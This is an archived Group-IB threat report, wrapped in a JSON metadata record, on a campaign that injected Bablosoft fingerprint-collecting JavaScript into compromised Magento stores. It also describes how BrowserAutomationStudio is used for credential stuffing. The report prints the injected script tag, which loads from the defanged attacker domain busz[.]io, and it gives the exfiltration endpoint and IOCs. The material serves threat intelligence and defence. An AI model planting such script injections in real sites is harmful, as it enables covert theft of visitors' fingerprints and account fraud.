{ "id": "a70fef8c-7e36-46c9-9c26-baa5cdced17d", "created_at": "2026-04-06T00:22:26.91974Z", "updated_at": "2026-04-10T03:36:48.187636Z", "deleted_at": null, "sha1_hash": "859a1bf990fa3a01b8d8dee0d4e479bef1f322db", "title": "Fingerprint Heists | Group-IB Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3721629, "plain_text": "Fingerprint Heists | Group-IB Blog\r\nArchived: 2026-04-02 12:40:32 UTC\r\nIntroduction\r\nFraudsters are continuously seeking innovative ways to exploit unsuspecting internet users. One of the latest and\r\nmost concerning techniques revolves around browser fingerprinting — a method that allows cybercriminals to\r\nsteal unique digital identifiers associated with user online activity.\r\nWhat makes browser fingerprinting particularly alarming is its invisibility. The victim might not even know that\r\nthe fingerprint has been captured or misused. Fraudsters can bypass security measures, impersonate victims on\r\ntrusted platforms, and commit fraudulent activities—all without triggering suspicion from security systems that\r\nrely on these fingerprints for authentication.\r\nThe implications are far-reaching, affecting individuals and organisations alike. Companies that rely on browser\r\nfingerprinting to detect fraud or prevent account takeovers may find their systems rendered ineffective. For\r\nindividuals, the theft of a fingerprint can result in unexpectedly being locked out of accounts on different online\r\nservices due to false positives triggered by fraud protection or security systems.\r\nIn this blog, we’ll delve into how browser fingerprints are collected, the methods fraudsters use to steal and\r\nexploit them, and the steps you can take to protect yourself. Whether you’re an individual user or a business\r\nlooking to enhance security, this guide will provide the insights to stay one step ahead of cybercriminals.\r\nKey discoveries in the blog\r\nAdvanced Fingerprinting Techniques: Cybercriminals exploit sophisticated methods to extract unique\r\nbrowser characteristics without user consent.\r\nIdentified malicious campaign collecting fingerprints of unaware users: a threat actor is compromising\r\nMagento websites to inject malicious code aimed at collecting the fingerprints of visiting users.\r\nRisks for Individuals: Individuals face potential account lockouts and false positives from fraud\r\nprotection systems, which can disrupt access to multiple online services.\r\nComprehensive Insight and Protection Strategies: The blog provides an in-depth exploration of how\r\nbrowser fingerprints are collected and exploited, along with practical steps for both businesses and\r\nindividuals.\r\nWho may find this blog interesting:\r\nCybersecurity analysts and corporate security teams\r\nMalware analysts\r\nHead of Fraud Protection\r\nThreat intelligence specialists\r\nCyber investigators\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 1 of 26\n\nComputer Emergency Response Teams (CERT)\r\nLaw enforcement investigators\r\nCyber police forces\r\nFingerprinting Collection Using Compromised Magento Websites\r\nCampaign Analysis\r\nIn October 2024, Group-IB threat intelligence and fraud protection specialists identified a malicious campaign that\r\nhad been ongoing since at least May 2024. In this campaign, a threat actor, now tracked as ScreamedJungle,\r\ninjected a Bablosoft JS script into compromised Magento websites to collect fingerprints of visiting users.\r\nAnalyses carried out by Group-IB analysts identified the compromise of more than 115 e-commerce websites.\r\nAlthough the technique used by the threat actor to compromise Magento online stores is not known with certainty,\r\nan analysis of the compromised sites suggests that the threat actor is likely exploiting known vulnerabilities\r\naffecting vulnerable Magento versions (e.g., CVE-2024-34102 – CosmicSting, CVE-2024-20720). This\r\nassumption is supported by the fact that many of the compromised websites detected use Magento 2.3, which\r\nreached end-of-life (EOL) status and has not been supported since September 2022.\r\nBelow is an example of an injected script on compromised websites:\r\nFigure 1. Example of injected Bablosoft fingerprinting script on compromised Magento website.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 2 of 26\n\n\u003cscript type=”text/javascript” charset=”UTF-8″ src=”hxxps://busz[.]io/j9z3GfPd?pr=1\u0026sub_id_2=\r\n{victim_domain}”\u003e\u003c/script\u003e\u003cscript\u003eif (!/Android|webOS|iPhone|iPad|BlackBerry|Windows Phone|Opera\r\nMini|IEMobile|Mobile/i.test(navigator.userAgent)) document.addEventListener(“DOMContentLoaded”,\r\nfunction(){ProcessFingerprint(false,\r\n“5rdc71h00d6udaqhuzgxhga02ewj095nvrk6nxah6vhrb70wqmu854mevhe27mgv”)});\u003c/script\u003e\r\nAs it is possible to observe from the image above, in most cases the injected script is hidden within an HTML\r\ncomment tag labeled `\u003c!– Google Finger Analytics –\u003e` to give it a legitimate appearance. More in general, the\r\nbehavior of the JS script can be summarized as follows:\r\nThe JS script is imported from a malicious domain under the threat actor control, in the above case is\r\nhosted on hxxps://busz[.]io/j9z3GfPd?pr=1\u0026sub_id_2={victim_domain}, which redirects to\r\nhxxps://busz[.]io/clientsafe.js;\r\nIf the user visiting the compromised site is using a desktop device, therefore not using any mobile user\r\nagent, the ProcessFingerprint function is executed;\r\nOnce the function is executed, several parameters related to the user visiting the compromised web pages\r\nare processed and collected (e.g., browser settings, plugin list, font list, systems properties and others);\r\nclientsafe.js\r\nA deeper analysis of the injected clientsafe.js script revealed that it is part of the Bablosoft\r\nBrowserAutomationStudio (BAS) suite; its purpose is to collect users’ fingerprints for later use on the Bablosoft\r\nFingerprintSwitcher module.\r\nFigure 2. FingerprintSwitcher webpage.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 3 of 26\n\nMore specifically, the threat actor is abusing a BabloSoft’s solution called “CustomServers” which allows them to\r\nindependently collect fingerprints and store them in a private Bablosoft database.\r\nFor fingerprints to be saved to the private database, the threat actor must provide the ProcessFingerprint function\r\nwith a public key assigned by BabloSoft when subscribing to the CustomServers service;  the public keys\r\nidentified in the campaign under analysis are as follows:\r\n5rdc71h00d6udaqhuzgxhga02ewj095nvrk6nxah6vhrb70wqmu854mevhe27mgv\r\nXc3blub4pxwvxhj0oc4ddtqgkkpm42my84uqo7hyv6zwfetg7hiwnnl9wlzwnso7\r\nFigure 3. An excerpt of CustomServers documentation.\r\nThe clientsafe.js script connects to Bablosoft’s server, retrieves encoded instructions like the PerfectCanvas\r\nrequest, and uses the eval function to run decoded instructions in the browser of visitors of the compromised\r\nwebsite. More details about PerfectCanvas and CustomServers are described later in the blog.\r\nFigure 4. How PerfectCanvas is generated on the CustomServer side.\r\nIn addition, the clientsafe.js script contains several other functions to collect information about the system and\r\nbrowser of users visiting the compromised website, such as:\r\nGetSystemFontData\r\nGetWebGPUData\r\ngetInstalledExtensions\r\nGetBatteryInfo\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 4 of 26\n\nGetWindowProperties\r\nGetDoNotTrack\r\nGetHLSSupport\r\nGetCodecsData\r\nGetUserAgentData\r\nGetMediaDevices\r\nGetVoices\r\nGetBluetoothData\r\nGetKeyboardLayout\r\nGetStorageSize\r\nGetFonts\r\nAs an example, the following is the function that leverages the Keyboard API to verify the layout used by a\r\nvisiting user:\r\nFigure 5. Function that collects information about keyboard layout.\r\nAll collected data are then sent to Bablosoft hxxps://customfingerprints[.]bablosoft[.]com/save endpoint and saved\r\non the threat actor private database via ServerPoster function.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 5 of 26\n\nFigure 6. Function that sends collected data.\r\nFigure 7. ServerPoster function.\r\nThe following is an example of a POST request to the endpoint, transmitting a JSON payload that includes the\r\nobtained fingerprint.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 6 of 26\n\nFigure 8. An excerpt of collected fingerprint transmitted via POST request.\r\nRefs:\r\nhttps://urlscan.io/responses/dcc1122bcf60d91acae0703de18ed4ac027f6d3d55eebd1e87c4f4647b2daeca/\r\nImpact – Case study: Italy\r\nTo better understand the impact of the campaign under analysis, we examined nine Italian websites that were\r\ncompromised in this campaign, some of which appear to still be infected at the time of writing, in order to\r\nestimate the amount of users for whom fingerprints may have been collected.\r\nTo this end, we utilized publicly available web data to estimate the traffic of the compromised sites, as well as the\r\nnumber of potential daily visitors.\r\nIndustry\r\nAverage number of\r\nmonthly visitors\r\nAverage number of\r\nmonthly unique\r\nvisitors\r\nAverage number of\r\ndaily unique visitors\r\nwebsite_1\r\nMedical\r\nEquipment\r\n~9.7k ~5.6k ~180\r\nwebsite_2 Retail ~600 ~300 ~10\r\nwebsite_3\r\nConsumer\r\nElectronics\r\n~56.8k ~39.9k ~1.3k\r\nwebsite_4 Pharmaceutical ~3.7k ~1.8k ~60\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 7 of 26\n\nwebsite_5 Jewelry ~77.1k ~48k ~1.5k\r\nwebsite_6 Retail ~2.5k ~1.5k ~50\r\nwebsite_7 Retail ~6.4k ~4.1k ~130\r\nwebsite_8 Retail ~35.1k ~22.1k ~700\r\nwebsite_9 Fashion ~15.5k ~7.9k ~250\r\nAlthough, as stated earlier, these are estimated volumes of the traffic received by the websites and could therefore\r\ndeviate from the actual values, it is possible to observe that only concerning the Italian market, this campaign is\r\nable to potentially collect over 200,000 fingerprints of Italian users monthly.\r\nWhat is Bablosoft?\r\nBablosoft develops automation tools often linked to cybercriminals activities such as credential stuffing, fraud\r\nschemes, and data harvesting.\r\nFigure 9. Bablosoft webpage.\r\nThe core product developed by Bablosoft is BrowserAutomationStudio (BAS), a tool for automating browser-based activities that does not require coding skills. It allows users to create scripts that simulate human actions on\r\nwebsites, such as clicking and filling out forms. Threat actors utilize theBAS suite to automate activities against\r\nwebsites, such as credential stuffing attacks, user registrations, and data scraping. Combined with the\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 8 of 26\n\nFingerprintSwitcher module, this setup mimics legitimate user behavior, significantly reducing the likelihood of\r\ndetection.\r\nBablosoft on Underground Communities\r\nThe first known mention of BAS dates back to April 2016, when a user under the pseudonym “Atabas” sponsored\r\nthe tool on PirateHub forum.\r\nFigure 10. First known Bablosoft-related post, originally in Russian, and translated into English.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 9 of 26\n\nFigure 10. First known Bablosoft-related post, originally in Russian, and translated into English.\r\nRegarding the FingerprintSwitcher module, the first known mention on the web of such a service dates back to\r\nFebruary 2017, where user “Twaego”, who is presumed to be one of the developers of the BAS suite, sponsored\r\nthe creation of the related service on the BlackHatWorld forum.\r\nFigure 11. Introduction of the BAS module to change fingerprints.\r\nAs mentioned above, the BAS suite, and all related modules, are widely used to carry out malicious activities and\r\nare a topic of interest in underground communities. In particular, its use is often seen as an alternative to other web\r\nautomation tools (e.g., openbullet), for the development of bruteforcers, checkers, autoregisters, scrapers, and\r\nmore. The following are examples of a post from developers offering their services for the development of\r\ntargeted BAS projects, and from a user looking for someone who can implement a bruteforcer to target a U.S.\r\nbank.\r\nFigure 12. BAS developers offer their services on underground forums. Translation:” Development on BAS |\r\nCheckers, autoregisters, parsers | Emulation/queries”. Originally in Russian, and translated into English.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 10 of 26\n\nFigure 12. BAS developers offer their services on underground forums. Translation:” Development on BAS |\r\nCheckers, autoregisters, parsers | Emulation/queries”. Originally in Russian, and translated into English.\r\nFigure 12. BAS developers offer their services on underground forums. Translation:” Development on BAS |\r\nCheckers, autoregisters, parsers | Emulation/queries”. Originally in Russian, and translated into English.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 11 of 26\n\nFigure 13. Forum user looking for a BAS developer to develop a brute-forcer targeting an American bank. English\r\ntranslation: ”Looking for a brut on [REDACTED] Bank, made on BAS or analogs, stable working from 3 months,\r\nthe deal is strictly through the guarantor, payment only after full verification. Price from 200$.”\r\nCredentials Stuffing with Bablosoft and FingerprintSwitcher\r\nThe technologies discussed above can be exploited by attackers in credential-stuffing campaigns. Credential\r\nstuffing is a type of activity where attackers exploit stolen account credentials to attempt unauthorized access to\r\nuser accounts.\r\nTo automate the process and avoid detection fraudsters can use different tools. By leveraging these capabilities\r\nattackers can test thousands of stolen username-password pairs against multiple websites without triggering\r\ntraditional security mechanisms. Fingerprinting spoofing ensures their requests appear as legitimate user activity,\r\nbypassing detection.\r\nAdditionally, stolen user fingerprints can have severe consequences for legitimate users. Fraudsters who reuse\r\nstolen device fingerprints can make it appear as though legitimate users’ devices are engaging in fraudulent\r\nbehavior. As a result, fraud protection systems may wrongfully block legitimate users, flagging their devices as\r\nhigh risk due to association with prior attacks.\r\nNote: Since credential-stuffing attacks have different variations, this specific example describes a case in which an\r\nattacker uses stolen or compromised credentials to target a specific  website. The main goal is the verification of\r\naccounts for further exploitation.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 12 of 26\n\nFigure 14. Example of BAS scripts offered in Darknet.\r\nUsing BAS, fraudsters can import a list of credentials, map out the login flow of a target website, and configure\r\nBAS to input the credentials repeatedly while monitoring for successful authentications enhancing the\r\neffectiveness of the attacks.\r\nFigure 15. Fraud Matrix of the Account Stuffing Attack.\r\nFigure 15 shows tactics and techniques of the Fraud Matrix framework executed during the attack. Below we will\r\ngo through the major stages with details.\r\nReconnaissance\r\nFraudsters start by identifying targets for the attack based on factors such as the availability of reused or exposed\r\ncredentials, the presence of weak security measures, the potential value of compromised accounts, and the ability\r\nto efficiently automate attacks using preconfigured tools (e.g., Bablosoft) tailored for specific targets, such as\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 13 of 26\n\nbanks or online portals. Then they should more deeply investigate the structure of the targeted website, i.e. the IDs\r\nof the HTML elements they have to interact with to emulate the real user.\r\nAs the next step, fraudsters search for a list of credentials usually referred to as combolist that will be used in\r\ncredential stuffing attacks against targeted websites. These combo lists can be obtained from various sources like\r\nunderground forums, and cybercrime communities in Telegram, and then fed into the BAS database as shown on\r\nthe Figure 16 below.\r\nFigure 16. Database Manage in BrowserAutomation Studio.\r\nResource development, Account Access\r\nBrowser Automation Studio offers a wide range of modules that can facilitate fraudsters’ activity: filesystem and\r\nnetwork operations, IP info services, phone verification services and others. Automation of the embedded browser\r\nbased on Chromium Embedded Framework (CEF)*. The non-exhaustive list is shown in the Figure 17 below.\r\n*CEF is an open-source framework for embedding the Chromium browser stack into other applications used by\r\nwell-known software vendors.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 14 of 26\n\nFigure 17. Browser Automation Studio Modules.\r\nBrowser Automation Studio could be considered an IDE for visual programming. It has a lot of control blocks that\r\nrepresent common statements and logical statements as shown in Figure 18.\r\nFigure 18. Script Logic blocks in Browser Automation Studio.\r\nThese control blocks allow for the quick creation of custom scripts that can operate with BAS modules. An\r\nexample of the script is shown in Figure 19.\r\nThe script requests a stolen fingerprint and applies it to an internal browser (step 1)\r\nreads credentials from the database (step 2)\r\nopens the website via the internal browser and inputs credentials to the form on the website (step3)\r\nidle for a while and press “Login” button (step 4) then wait until the page is loaded\r\nupdates corresponding records in the database in case a specific HTML exists (step 5)\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 15 of 26\n\nFigure 19. Script Editor in Browser Automation Studio.\r\nDefence evasion (Fraud Protection systems Bypass)\r\nBrowser Automation Studio offers a wide range of capabilities to bypass fraud protection systems. Some of them\r\nare implemented as a part of the Bablosoft ecosystem and others are integrations with third-party services.\r\nFor example, CAPTCHA solving modules are implemented by third parties, some of which are generic and some\r\ntargeting specific well-known CAPTCHA vendors.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 16 of 26\n\nFigure 20. Captcha Solving Modules in Browser Automation Studio.\r\nThe other example of third-party integration is the phone verification module that allows the use of temporary\r\nphone numbers.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 17 of 26\n\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 18 of 26\n\nFigure 21. The example of phone number verification.\r\nThe most interesting part of the defence evasion capabilities is fingerprint spoofing. It leverages the PerfectCanvas\r\ntechnology.\r\nPerfectCanvas\r\nPerfectCanvas is a technology that allows BAS to receive fingerprints from real devices to bypass canvas\r\nfingerprinting methods of fraud protection systems. The high-level process looks as follows:\r\n1. The canvas is first rendered on a separate, remote machine.\r\n2. The rendered canvas data is then sent to the local machine.\r\n3. The canvas data in the BAS browser is replaced with the remotely rendered data.\r\nThe key difference of this method is that the canvas data transmitted is byte-for-byte identical to that generated on\r\nthe real device, rather than being obtained by adding noise to the origin canvas.\r\nTo use PerfectCanvas, the fraudster must visit the targeted site using a specialized browser called\r\nCanvasInspector, which is designed to generate the “PerfectCanvas request.”\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 19 of 26\n\nFigure 22. CanvasInpector.\r\nThe “PerfectCanvas request” is a string that contains all the necessary information to render the canvas on a\r\nremote machine.\r\nFigure 23. “PerfectCanvas request” for browserleaks[.]com.\r\nOnce the fraudster has the “PerfectCanvas request,” they can obtain fingerprints with the PerfectCanvas\r\nreplacement by sending a request to the server and receiving a response.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 20 of 26\n\nFigure 24. The PerfectCanvas workflow.\r\nBablosoft offers fraudsters the CustomServers feature to pre-collect fingerprints and instantly use them in\r\nfraudulent transactions. CustomServer — a web server that hosts the clientSafe.js script. As mentioned above, this\r\nscript generates fingerprints on demand. By injecting into popular websites, fraudsters receive hundreds of\r\nthousands of fingerprints from the devices of unaware users per month.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 21 of 26\n\nFigure 25. The stolen fingerprints abuse via CustomServers.\r\nPerform fraud and Monetization\r\nOnce fraudsters prepare their scripts they can run them on previously gathered credentials databases for in-bulk\r\nexfiltration of some useful account data e.g., payment details, and personal data. This opens an opportunity for\r\nselling more quality and enriched databases.\r\nAnother feature of BrowserAutomationStudio (BAS) is its ability to compile scripts into standalone executable\r\nfiles. This means that once an attacker creates a credential-stuffing script using BAS, they can package it into an\r\nexecutable program that runs independently of the BAS environment. These compiled scripts can be easily\r\ndistributed, offered, or shared with other fraudsters.\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 22 of 26\n\nFigure 26. Compile Script window of Browser Automation Studio.\r\nConclusion\r\nBrowser fingerprinting is a powerful technique commonly used by websites to track user activities and tailor\r\nmarketing strategies. However, this information is also exploited by cybercriminals to mimic legitimate user\r\nbehavior, evade security measures, and conduct fraudulent activities. The identification of a malicious campaign\r\nspecifically designed to compromise e-commerce websites and collect the fingerprints of unaware users\r\nunderscores the high value of this information within the cybercriminal community and highlights the need for\r\ncontinued research and analysis of the tools and techniques used for illicit purposes, enabling security teams to\r\nimprove detection capabilities and strengthen defenses against fraudulent activities.\r\nTo this end, we report below some recommendations for the different entities involved in the identified campaign.\r\nFor website owners:\r\nRegularly conduct a website analysis to evaluate its integrity and eliminate any potential persistence\r\nmechanisms or malicious files;\r\nKeep systems up-to-date and always install relevant security patches;\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 23 of 26\n\nUse complex passwords and adopt two-factor authentication;\r\nMonitor accesses of privileged accounts;\r\nPerforms security audits (e.g., vulnerability assessments, penetration tests) periodically in order to identify\r\nthe presence of any vulnerabilities that could lead to website compromise;\r\nAdvice for end users to limit exposure of their fingerprint:\r\nUse privacy-oriented browsers that implement additional protection measures to block suspicious\r\nfingerprint scripts;\r\nUse trusted and reliable browser extensions aimed at blocking the execution of suspicious javascript and\r\ndetection of tracking techniques;\r\nRecommendations for cybersecurity and fraud teams for prevention and detection of attacks with Browser\r\nAutomation Studio and\r\nIdentify changes in known user environment, i.e. change of operating system and metadata;\r\nSubscribe for intelligence services (i.e. threat intelligence, fraud intelligence) to be updated with evolving\r\nfraud schemes and technologies\r\nUse Multi-Factor Authentication (MFA) for authentication processes or sensitive user activity, i.e. for\r\npassword changing.\r\nExamples of Fraud Matrix  mitigations and detections sorted by efficiency:\r\nHigh Efficiency\r\nMitigations:\r\nFraud Matrix ID Description\r\nM2011 Multi-Factor Authentication (MFA)\r\nM2007 Account Use Policy\r\nM2026 Device Binding\r\nDetections:\r\nFraud Matrix ID Data Source  Data Component\r\nDS2020 Network Traffic Traffic Patterns\r\nDS2057 Browser API Canvas API\r\nModerate Efficiency\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 24 of 26\n\nMitigations\r\nFraud Matrix ID Description\r\nM2017 User Notifications \u0026 Alerts\r\nM2015 Geofencing\r\nDetections\r\nFraud Matrix ID Data Source  Data Component\r\nDS2026 User Account User Account Authentication\r\nDS2027 User Account User Account Metadata\r\nDS2001 Dark Web Dark Web Monitoring\r\nNote: DS2001 is useful for early detection but relies on external sources and doesn’t directly prevent attacks in\r\nreal time.\r\nMITRE ATT\u0026CK\r\nFigure 27. ScreamedJungle ATT\u0026CK\r\nT1588.005 Obtain Capabilities: Exploits\r\nScreamedJungle obtained exploits to target vulnerable Magento\r\nplatforms\r\nT1189 Drive-by Compromise\r\nScreamedJungle leverages compromised websites to inject\r\nmalicious JS\r\nT1059.007 Command and Scripting\r\nInterpreter: JavaScript\r\nThe injected malicious JS is executed by the browser of users\r\nvisiting compromised websites\r\nT1119 Automated Collection Users’ fingerprint is automatically collected\r\nIndicators of Compromise (IOCs)\r\nNetwork Indicators:\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 25 of 26\n\nIndicator Type\r\nbusz[.]io domain\r\nhxxps://busz[.]io/j9z3GfPd?pr=1 URL\r\nhxxps://busz[.]io/clientsafe.js URL\r\nscreamedjungle[.]com domain\r\nhxxps://screamedjungle[.]com/mjzNTg?pr=1 URL\r\nhxxps://screamedjungle[.]com/clientsafe.js URL\r\nFile indicators:\r\nSHA256 Filename\r\ndcc1122bcf60d91acae0703de18ed4ac027f6d3d55eebd1e87c4f4647b2daeca clientsafe.js\r\nSource: https://www.group-ib.com/blog/fingerprint-heists/\r\nhttps://www.group-ib.com/blog/fingerprint-heists/\r\nPage 26 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "references": [ "https://www.group-ib.com/blog/fingerprint-heists/" ], "report_names": [ "fingerprint-heists" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "7110224a-65ef-4aa6-8d82-ea5bbd70ade6", "created_at": "2025-03-21T02:00:03.847783Z", "updated_at": "2026-04-10T02:00:03.839795Z", "deleted_at": null, "main_name": "ScreamedJungle", "aliases": [], "source_name": "MISPGALAXY:ScreamedJungle", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434946, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/859a1bf990fa3a01b8d8dee0d4e479bef1f322db.pdf", "text": "https://archive.orkl.eu/859a1bf990fa3a01b8d8dee0d4e479bef1f322db.txt", "img": "https://archive.orkl.eu/859a1bf990fa3a01b8d8dee0d4e479bef1f322db.jpg" } }